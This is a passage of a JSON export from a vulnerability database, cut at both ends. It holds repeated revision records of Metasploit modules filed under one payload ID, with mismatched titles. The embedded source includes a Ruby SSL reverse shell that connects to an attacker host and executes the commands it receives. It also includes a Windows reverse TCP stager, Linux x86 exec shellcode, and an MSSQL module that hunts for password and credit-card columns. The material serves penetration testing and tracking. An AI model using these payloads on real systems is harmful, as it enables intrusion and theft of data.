Msf::Sessions::CommandShell,\n 'PayloadType' => 'ruby',\n 'Payload' => { 'Offsets' => {}, 'Payload' => '' }\n ))\n end\n\n def generate\n rbs = prepends(ruby_string)\n vprint_good rbs\n return rbs\n end\n\n def ruby_string\n lhost = datastore['LHOST']\n lhost = \"[#{lhost}]\" if Rex::Socket.is_ipv6?(lhost)\n rbs = \"require 'socket';require 'openssl';c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new(\\\"#{lhost}\\\",\"\n rbs << \"\\\"#{datastore['LPORT']}\\\")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,\\\"r\\\"){|io|c.print io.read}end\"\n return rbs\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-16T09:57:18", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 22}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-16T12:38:21", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 4.2, "vector": "NONE", "modified": "2019-08-16T12:38:21"}, "dependencies": {"references": [{"type": "thn", "idList": ["THN:878061A73E138AD892EFFB4D6E6F0C11"]}, {"type": "exploitdb", "idList": ["EDB-ID:47280", "EDB-ID:47282", "EDB-ID:47283", "EDB-ID:47279", "EDB-ID:47273", "EDB-ID:47275", "EDB-ID:47272", "EDB-ID:47278", "EDB-ID:47274", "EDB-ID:47276"]}, {"type": "hackread", "idList": ["HACKREAD:796ACB5B55194E34D2B701E163319A43"]}, {"type": "cve", "idList": ["CVE-2019-3974"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:787E98D1B1057EA67AB600F0E0353E27"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1909-1", "OPENSUSE-SU-2019:1897-1", "OPENSUSE-SU-2019:1894-1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:B266436DCF99567ABAD2E71A57DCE831"]}], "modified": "2019-08-16T12:38:21"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-16T12:38:21", "differentElements": ["modified", "published"], "edition": 23}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "782981c5f3ef7ed2032227c6b3eba8ad", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-16T16:05:28", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 4.0, "vector": "NONE", "modified": "2019-08-16T16:05:28"}, "dependencies": {"references": [{"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:FFD1791EA2083DB175F1951CF4CBA8A2"]}, {"type": "thn", "idList": ["THN:878061A73E138AD892EFFB4D6E6F0C11"]}, {"type": "exploitdb", "idList": ["EDB-ID:47284", "EDB-ID:47280", "EDB-ID:47282", "EDB-ID:47283", "EDB-ID:47279", "EDB-ID:47275", "EDB-ID:47274", "EDB-ID:47272", "EDB-ID:47277", "EDB-ID:47270"]}, {"type": "hackread", "idList": ["HACKREAD:796ACB5B55194E34D2B701E163319A43"]}, {"type": "cve", "idList": ["CVE-2019-3974"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:787E98D1B1057EA67AB600F0E0353E27"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1909-1", "OPENSUSE-SU-2019:1897-1", "OPENSUSE-SU-2019:1894-1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:B266436DCF99567ABAD2E71A57DCE831"]}], "modified": "2019-08-16T16:05:28"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-16T16:05:28", "differentElements": ["modified", "published"], "edition": 24}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-16T18:02:07", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 4.0, "vector": "NONE", "modified": "2019-08-16T18:02:07"}, "dependencies": {"references": [{"type": "carbonblack", "idList": ["CARBONBLACK:3411E786B5C5C96A8446AD30DA10EEB2", "CARBONBLACK:DD729BDA1E86C64591EEF8B9FB5F9933"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:FFD1791EA2083DB175F1951CF4CBA8A2"]}, {"type": "talosblog", "idList": ["TALOSBLOG:AE189A67BCAD633AD9D7838F9DF4F6D5", "TALOSBLOG:B266436DCF99567ABAD2E71A57DCE831"]}, {"type": "thn", "idList": ["THN:878061A73E138AD892EFFB4D6E6F0C11"]}, {"type": "exploitdb", "idList": ["EDB-ID:47284", "EDB-ID:47280", "EDB-ID:47282", "EDB-ID:47283", "EDB-ID:47272", "EDB-ID:47270", "EDB-ID:47273", "EDB-ID:47278"]}, {"type": "hackread", "idList": ["HACKREAD:796ACB5B55194E34D2B701E163319A43"]}, {"type": "cve", "idList": ["CVE-2019-3974"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:787E98D1B1057EA67AB600F0E0353E27"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1909-1", "OPENSUSE-SU-2019:1897-1", "OPENSUSE-SU-2019:1894-1"]}], "modified": "2019-08-16T18:02:07"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-16T18:02:07", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 25}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "318ad7627257422163a317ff66058664", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Execute Command", "description": "Execute an arbitrary command\n", "published": "2005-07-17T06:01:11", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-02T19:08:18", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 3.9, "vector": "NONE", "modified": "2019-09-02T19:08:18"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:47332", "EDB-ID:47343", "EDB-ID:47341", "EDB-ID:47334", "EDB-ID:47333", "EDB-ID:47335", "EDB-ID:47331"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154291", "PACKETSTORM:154289", "PACKETSTORM:154290", "PACKETSTORM:154286", "PACKETSTORM:154295", "PACKETSTORM:154277", "PACKETSTORM:154276"]}, {"type": "kitploit", "idList": ["KITPLOIT:686395010458487489", "KITPLOIT:817246461335513509"]}, {"type": "cve", "idList": ["CVE-2019-2390"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E352F60FA2366D4E0CC72C4BA45B2650"]}, {"type": "centos", "idList": ["CESA-2019:2308", "CESA-2019:2157"]}], "modified": "2019-09-02T19:08:18"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/linux/x86/exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n###\n#\n# Exec\n# ----\n#\n# Executes an arbitrary command.\n#\n###\nmodule MetasploitModule\n\n CachedSize = 43\n\n include Msf::Payload::Single\n include Msf::Payload::Linux\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Linux Execute Command',\n 'Description' => 'Execute an arbitrary command',\n 'Author' => 'vlad902',\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86))\n\n # Register exec options\n register_options(\n [\n OptString.new('CMD', [ true, \"The command string to execute\" ]),\n ])\n end\n\n #\n # Dynamically builds the exec payload based on the user's options.\n #\n def generate_stage(opts={})\n cmd = datastore['CMD'] || ''\n payload =\n \"\\x6a\\x0b\\x58\\x99\\x52\\x66\\x68\\x2d\\x63\\x89\\xe7\\x68\" +\n \"\\x2f\\x73\\x68\\x00\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\" +\n Rex::Arch::X86.call(cmd.length + 1) + cmd + \"\\x00\" +\n \"\\x57\\x53\\x89\\xe1\\xcd\\x80\"\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-02T19:08:18", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 26}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-02T19:57:23", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 3.0, "vector": "NONE", "modified": "2019-09-02T19:57:23"}, "dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:154289", "PACKETSTORM:154291", "PACKETSTORM:154290", "PACKETSTORM:154295", "PACKETSTORM:154286", "PACKETSTORM:154277", "PACKETSTORM:154276"]}, {"type": "exploitdb", "idList": ["EDB-ID:47332", "EDB-ID:47343", "EDB-ID:47334", "EDB-ID:47341", "EDB-ID:47333", "EDB-ID:47331", "EDB-ID:47335"]}, {"type": "kitploit", "idList": ["KITPLOIT:686395010458487489", "KITPLOIT:817246461335513509"]}, {"type": "cve", "idList": ["CVE-2019-2390"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E352F60FA2366D4E0CC72C4BA45B2650"]}, {"type": "centos", "idList": ["CESA-2019:2308", "CESA-2019:2157"]}], "modified": "2019-09-02T19:57:23"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-02T19:57:23", "differentElements": ["description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 27}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "d3210e501402771262dee5d7e5dc100c", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft SQL Server Interesting Data Finder", "description": "This module will search the specified MSSQL server for 'interesting' columns and data. The module has been tested against SQL Server 2005 but it should also work on SQL Server 2008. The module will not work against SQL Server 2000 at this time, if you are interested in supporting this platform, please contact the author.\n", "published": "2010-07-07T14:48:08", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.digininja.org/metasploit/mssql_idf.php"], "cvelist": [], "lastseen": "2019-09-13T03:16:54", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 4.3, "vector": "NONE", "modified": "2019-09-13T03:16:54"}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB4512501", "KB4516033", "KB4516065", "KB4512486", "KB4512506"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:B0CD7E35E3EF7618C64840F2A61B2BDF", "CARBONBLACK:F2261953D5B0B3A30657F38C28BB90AD"]}, {"type": "kitploit", "idList": ["KITPLOIT:8970937124152019920"]}, {"type": "exploitdb", "idList": ["EDB-ID:47381", "EDB-ID:47382"]}, {"type": "cve", "idList": ["CVE-2019-1269", "CVE-2019-1289", "CVE-2019-1235", "CVE-2019-1282", "CVE-2019-1246", "CVE-2019-1242", "CVE-2019-1287", "CVE-2019-1291", "CVE-2019-1271", "CVE-2019-1214"]}], "modified": "2019-09-13T03:16:54"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/mssql/mssql_idf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n##\n# Author: Robin Wood <robin@digininja.org> <http://www.digininja.org>\n# Version: 0.1\n#\n# This module will search the specified MSSQL server for\n# 'interesting' columns and data\n#\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::MSSQL\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft SQL Server Interesting Data Finder',\n 'Description' => %q{\n This module will search the specified MSSQL server for\n 'interesting' columns and data.\n\n The module has been tested against SQL Server 2005 but it should also work on\n SQL Server 2008. The module will not work against SQL Server 2000 at this time,\n if you are interested in supporting this platform, please contact the author.\n },\n 'Author' => [ 'Robin Wood <robin[at]digininja.org>' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'http://www.digininja.org/metasploit/mssql_idf.php' ],\n ],\n 'Targets' =>\n [\n [ 'MSSQL 2005', { 'ver' => 2005 }\t],\n ]\n ))\n\n register_options(\n [\n OptString.new('NAMES', [ true, 'Pipe separated list of column names', 'passw|bank|credit|card']),\n ])\n end\n\n def print_with_underline(str)\n print_line(str)\n print_line(\"=\" * str.length)\n end\n\n def run\n headings = [\n [\"Database\", \"Schema\", \"Table\", \"Column\", \"Data Type\", \"Row Count\"]\n ]\n\n sql = \"\"\n sql += \"DECLARE @dbname nvarchar(255), @id int, @sql varchar (4000); \"\n sql += \"DECLARE table_cursor CURSOR FOR SELECT name FROM sys.databases \"\n sql += \"OPEN table_cursor \"\n sql += \"FETCH NEXT FROM table_cursor INTO @dbname \"\n sql += \"WHILE (@@FETCH_STATUS = 0) \"\n sql += \"BEGIN \"\n sql += \"SET @sql = 'select ';\"\n sql += \"SET @sql = @sql + ' ''' + @dbname + ''' as ''Database'', ';\"\n sql += \"SET @sql = @sql + 'sys.schemas.name as ''Schema'', ';\"\n sql += \"SET @sql = @sql + 'sys.objects.name as ''Table'', ';\"\n sql += \"SET @sql = @sql + 'sys.columns.name as ''Column'', ';\"\n sql += \"SET @sql = @sql + 'sys.types.name as ''Column Type'' ';\"\n sql += \"SET @sql = @sql + 'from ' + @dbname + '.sys.columns ';\"\n sql += \"SET @sql = @sql + 'inner join ' + @dbname + '.sys.objects on sys.objects.object_id = sys.columns.object_id ';\"\n sql += \"SET @sql = @sql + 'inner join ' + @dbname + '.sys.types on sys.types.user_type_id = sys.columns.user_type_id ';\"\n sql += \"SET @sql = @sql + 'inner join ' + @dbname + '.sys.schemas on sys.schemas.schema_id = sys.objects.schema_id ';\"\n\n list = datastore['Names']\n where = \"SET @sql = @sql + ' WHERE (\"\n list.split(/\\|/).each { |val|\n where += \" lower(sys.columns.name) like ''%\" + val + \"%'' OR \"\n }\n\n where.slice!(-3, 4)\n\n where += \") ';\"\n\n sql += where\n\n sql += \"SET @sql = @sql + 'and sys.objects.type=''U'';';\"\n sql += \"EXEC (@sql);\"\n sql += \"FETCH NEXT FROM table_cursor INTO @dbname \"\n sql += \"END \"\n sql += \"CLOSE table_cursor \"\n sql += \"DEALLOCATE table_cursor \"\n\n begin\n if mssql_login_datastore\n result = mssql_query(sql, false)\n column_data = result[:rows]\n else\n print_error('Login failed')\n return\n end\n rescue Rex::ConnectionRefused => e\n print_error(\"Connection failed: #{e}\")\n return\n end\n\n column_data = result[:rows]\n widths = [0, 0, 0, 0, 0, 9]\n total_width = 0\n\n (column_data|headings).each { |row|\n 0.upto(4) { |col|\n widths[col] = row[col].length if row[col].length > widths[col]\n }\n }\n\n widths.each { |a|\n total_width += a\n }\n\n print_line\n\n buffer = \"\"\n headings.each { |row|\n 0.upto(5) { |col|\n buffer += row[col].ljust(widths[col] + 1)\n }\n print_line(buffer)\n print_line\n buffer = \"\"\n\n 0.upto(5) { |col|\n buffer += print \"=\" * widths[col] + \" \"\n }\n print_line(buffer)\n print_line\n }\n\n column_data.each { |row|\n count_sql = \"SELECT COUNT(*) AS count FROM \"\n\n full_table = \"\"\n column_name = \"\"\n buffer = \"\"\n 0.upto(4) { |col|\n full_table += row[col] + '.' if col < 3\n column_name = row[col] if col == 3\n buffer += row[col].ljust(widths[col] + 1)\n }\n full_table.slice!(-1, 1)\n count_sql += full_table\n\n result = mssql_query(count_sql, false) if mssql_login_datastore\n\n count_data = result[:rows]\n row_count = count_data[0][0]\n\n buffer += row_count.to_s\n print_line(buffer)\n print_line\n }\n\n print_line\n disconnect\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-13T03:16:54", "differentElements": ["description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 28}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-13T05:32:42", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 4.3, "vector": "NONE", "modified": "2019-09-13T05:32:42"}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB4512501", "KB4516033", "KB4516065", "KB4512486", "KB4512506"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:B0CD7E35E3EF7618C64840F2A61B2BDF", "CARBONBLACK:F2261953D5B0B3A30657F38C28BB90AD"]}, {"type": "kitploit", "idList": ["KITPLOIT:8970937124152019920"]}, {"type": "exploitdb", "idList": ["EDB-ID:47381", "EDB-ID:47382"]}, {"type": "cve", "idList": ["CVE-2019-1271", "CVE-2019-1289", "CVE-2019-1291", "CVE-2019-1241", "CVE-2019-1214", "CVE-2019-1235", "CVE-2019-1242", "CVE-2019-1287", "CVE-2019-1282", "CVE-2019-1269"]}], "modified": "2019-09-13T05:32:42"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-13T05:32:42", "differentElements": ["modified", "published"], "edition": 29}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "782981c5f3ef7ed2032227c6b3eba8ad", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-23T15:02:38", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 3.8, "vector": "NONE", "modified": "2019-09-23T15:02:38"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:47408", "EDB-ID:47407", "EDB-ID:47401"]}, {"type": "kitploit", "idList": ["KITPLOIT:1828759017764294422", "KITPLOIT:8450240194909548501"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20190921-01-DEBUG"]}, {"type": "cve", "idList": ["CVE-2019-6145"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:88B3739C40911AEE494A457ECD8EB065"]}, {"type": "threatpost", "idList": ["THREATPOST:067710C6659ABBDC4D0EF1D55FBAA4D4", "THREATPOST:91C8490D648FB4F23E83E6D699AA09E9"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:69C9337EACF910EA5FA86B5EA064E7E0"]}, {"type": "talosblog", "idList": ["TALOSBLOG:25506C78BB084870681BE9F9E1357045", "TALOSBLOG:447DDD14CB51AB5B358C002E9398C9F5"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:30E6F331B0933D74F30CE6FBDFB8F0BA"]}, {"type": "thn", "idList": ["THN:7F6095CDC4316E31C321DF2BCD6B3AB3"]}, {"type": "ics", "idList": ["ICSA-19-262-01"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154547"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310876810", "OPENVAS:1361412562310815473", "OPENVAS:1361412562310876814"]}], "modified": "2019-09-23T15:02:38"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-23T15:02:38", "differentElements": ["modified", "published"], "edition": 30}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-23T16:15:00", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 3.8, "vector": "NONE", "modified": "2019-09-23T16:15:00"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:47407", "EDB-ID:47408", "EDB-ID:47401"]}, {"type": "kitploit", "idList": ["KITPLOIT:1828759017764294422", "KITPLOIT:8450240194909548501"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20190921-01-DEBUG"]}, {"type": "cve", "idList": ["CVE-2019-6145"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:88B3739C40911AEE494A457ECD8EB065"]}, {"type": "threatpost", "idList": ["THREATPOST:067710C6659ABBDC4D0EF1D55FBAA4D4", "THREATPOST:91C8490D648FB4F23E83E6D699AA09E9"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:69C9337EACF910EA5FA86B5EA064E7E0"]}, {"type": "talosblog", "idList": ["TALOSBLOG:25506C78BB084870681BE9F9E1357045", 